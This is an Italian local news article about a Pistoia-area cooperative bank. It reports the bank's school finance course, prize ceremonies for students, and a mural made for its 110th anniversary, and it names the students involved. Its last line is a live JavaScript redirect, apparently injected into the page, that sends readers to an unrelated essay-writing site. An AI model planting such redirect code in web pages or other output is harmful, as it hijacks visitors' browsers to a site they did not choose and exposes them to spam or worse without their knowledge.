QUARRATA. Due giorni di festa, giovedì 29 e venerdì 30 maggio, per premiare i ragazzi protagonisti del progetto “A scuola di Banca” e quelli che, in occasione del 110° anniversario dell’istituto di credito, hanno realizzato il murales nella parete di fronte all’ingresso della sede di Quarrata.
La Banca di Vignole e della Montagna Pistoiese continua ad investire nelle giovani generazioni: quest’anno il corso di alta formazione “A scuola di Banca”, giunto alla sesta edizione presso l’Istituto del settore economico Capitini di Agliana, si è esteso all’Istituto tecnico commerciale Fermi di San Marcello Pistoiese. Docenti di economia aziendale delle rispettive scuole, affiancati dal personale della Banca, hanno svolto otto incontri-lezioni per far conoscere agli studenti delle classi quarte e quinte il funzionamento di un istituto di credito, la disciplina del sistema bancario europeo ed italiano, le autorità creditizie e di vigilanza, le forme di raccolta e gli istituti giuridici e contrattuali a tutela del risparmiatore, e il modello d’impresa delle banche di credito cooperativo come fattore di sviluppo economico e sociale del territorio di appartenenza.
Al termine del corso, gli studenti hanno sostenuto un esame finale: i tre che in ciascuna scuola hanno riportato la votazione più alta riceveranno premi in denaro e avranno la possibilità di effettuare uno stage presso la Banca di Vignole e della Montagna Pistoiese. A tutti gli studenti sarà inoltre consegnato un attestato di partecipazione. Le premiazioni avverranno in due diverse date: la mattina di giovedì 29 maggio la cerimonia si terrà a San Marcello Pistoiese, in concomitanza con la “Festa della musica”, organizzata dall’Istituto comprensivo statale.
Venerdì 30 maggio, dalle ore 10, i riconoscimenti agli studenti del Capitini saranno consegnati presso l’auditorium Marcello “Cesare” Fabbri, dove saranno presenti anche i ragazzi della classe 1°g del liceo artistico Petrocchi (sede staccata di Quarrata), che sotto la supervisione del professor Daniele Rossi e del writer pratese Edoardo Buccianti hanno realizzato il graffito per i 110 anni della Banca.
Come gadget ai giovani sarà consegnata anche una tazza che riproduce l’immagine da loro realizzata nel murales. Nell’occasione sarà inoltre proiettato il filmato storico che ripercorre in 110 secondi i 110 anni della Bcc e il video che mostra i giovani al lavoro, mentre danno vita al graffito.
«Oltre a confermare le iniziative che promuoviamo da tanti anni, come le borse di studio e i contributi alle famiglie per l’acquisto di libri – afferma Giancarlo Gori, presidente Bcc Vignole e Montagna Pistoiese – nel 2014 abbiamo coinvolto le scuole del territorio in altre attività per festeggiare insieme il traguardo dei 110 anni di fondazione della Banca. È nata così l’idea del murales e del concorso video “Il mio paese 110 anni fa…o giù di lì” riservato alle scuole medie. È un modo per avvicinare le nuove generazioni ai valori della cooperazione e per renderli parte attiva della comunità in cui sono cresciuti».
Di seguito i nomi dei ragazzi che hanno “firmato” il murales dei 110 anni della Banca: Francesca Baglini, Davide Bartalesi, Giulia Bonacchi, Samuele Caselli, Rosita Cesare, Giulia Cimarelli, Annachiara Corona, Daniele Dalle Piane, Giulia Fanti, Lorenzo Faragli, Lorenzo Carlo Gacci, Elisa Gherardotti, Sara Gualtierotti, Caterina Mari, Giovanni Maria Karmak Nava, Brigitta Nunziati, Luca Pagliai, Alexandru Ion Petrescu, Dario Scialabba, Giulia Tancredi.
window.location = “http://paper-help24h.com”;